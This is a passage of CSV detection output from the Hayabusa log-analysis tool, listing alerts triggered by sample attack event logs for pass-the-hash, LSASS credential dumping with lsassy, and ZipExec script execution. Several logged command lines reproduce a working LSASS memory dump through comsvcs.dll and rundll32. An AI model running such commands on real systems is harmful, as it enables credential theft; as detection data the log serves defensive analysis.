+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication 
Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 
23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process 
LSASS,,rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe 
C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 
7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 
7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 
0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 
23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on 
LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 
+09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 
00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.523 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip 
